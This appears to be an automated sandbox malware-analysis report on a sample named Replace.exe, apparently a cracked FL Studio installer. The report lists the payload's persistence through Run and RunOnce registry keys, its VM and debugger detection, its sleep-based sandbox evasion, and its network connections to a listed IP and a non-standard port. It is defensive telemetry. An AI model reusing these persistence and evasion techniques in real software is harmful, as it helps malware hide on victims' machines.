Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run InetHelperJump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelperJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelperJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelperJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelperJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelperJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cleaninethelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelperJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce InetHelperJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 6101
Source: unknownNetwork traffic detected: HTTP traffic on port 6101 -> 49757
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DefaultIPGateway, GatewayCostMetric, IPConnectionMetric, Index FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NetConnectionID, MACAddress FROM Win32_NetworkAdapter WHERE Index=1
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1328Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1331Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1333
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDropped PE file which has not been started: C:\Program Files\Image-Line\FL Studio 20\FL64.exeJump to dropped file
Source: C:\Users\user\Desktop\Replace.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wsc86FC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeDropped PE file which has not been started: C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_1-204
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep time: -200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7612Thread sleep count: 1328 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8348Thread sleep time: -200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8348Thread sleep count: 1331 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8664Thread sleep time: -200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8664Thread sleep count: 1333 > 30
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 1328 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 1331 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 1333 delay: -10
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB2EFC FindFirstFileA,FindFirstFileW,0_2_00BB2EFC
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB9B8F8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_00007FF75FB9B8F8
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC0870 FindFirstFileExA,2_2_00007FF75FBC0870
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB0310 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,2_2_00007FF75FBB0310
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_0040672B FindFirstFileW,FindClose,13_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00402868 FindFirstFileW,13_2_00402868
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_00402868 FindFirstFileW,20_2_00402868
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BB805B GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,0_2_00BB805B
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 200000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelperJump to behavior
Source: node.exe, 00000017.00000002.2243002549.00000000020E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3R
Source: rundll32.exe, 0000000A.00000002.2283478293.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: rundll32.exe, 0000000A.00000002.2283478293.0000000002E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: rundll32.exe, 00000001.00000002.2143068328.000000000291D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.2142874146.00000000028E3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.2108933637.000000000291D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2195281526.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229422282.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2229301918.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2261502144.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2284339573.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2261300042.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmp, node.exe, 00000017.00000002.2243002549.00000000020E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: node.exe, 0000001E.00000002.2323469953.000000000EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeAPI call chain: ExitProcess graph end nodegraph_2-21967
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpAPI call chain: ExitProcess graph end nodegraph_13-3704
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCC996 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCC996
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD269F mov eax, dword ptr fs:[00000030h]0_2_00BD269F
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD26E3 mov eax, dword ptr fs:[00000030h]0_2_00BD26E3
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD0F91 mov eax, dword ptr fs:[00000030h]0_2_00BD0F91
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD4909 GetProcessHeap,0_2_00BD4909
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCC996 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCC996
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BD1922 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD1922
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCCB2A SetUnhandledExceptionFilter,0_2_00BCCB2A
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCBE82 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BCBE82
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBC6D04 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF75FBC6D04
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB43E0 SetUnhandledExceptionFilter,2_2_00007FF75FBB43E0
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBBDB3C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF75FBBDB3C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBB41FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF75FBB41FC

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.67.152.151 443
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"14_2_00ED107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"22_2_0057107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeCode function: EntryPoint,GetModuleFileNameW,_wsplitpath,GetCommandLineW,wcsstr,CreateToolhelp32Snapshot,memset,Process32FirstW,CloseHandle,_wcsicmp,_wcsicmp,OpenProcess,QueryFullProcessImageNameW,_wcsicmp,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,CreateFileW,free,FindCloseChangeNotification,MoveFileExW,memset,CreateFileW,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,free,free,free,memset,CreateProcessW,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,RegCreateKeyExW,wcslen,wcslen,RegSetValueExW,RegSetValueExW,RegCloseKey,RegCloseKey,free,RegCreateKeyExW,wcslen,RegSetValueExW,RegCloseKey, explorer.exe,"29_2_00FE107D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:tableJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: run.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EffectsShell_TrayWnd
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BC08B5 cpuid 0_2_00BC08B5
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_00007FF75FBAEC5C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData VolumeInformationJump to behavior
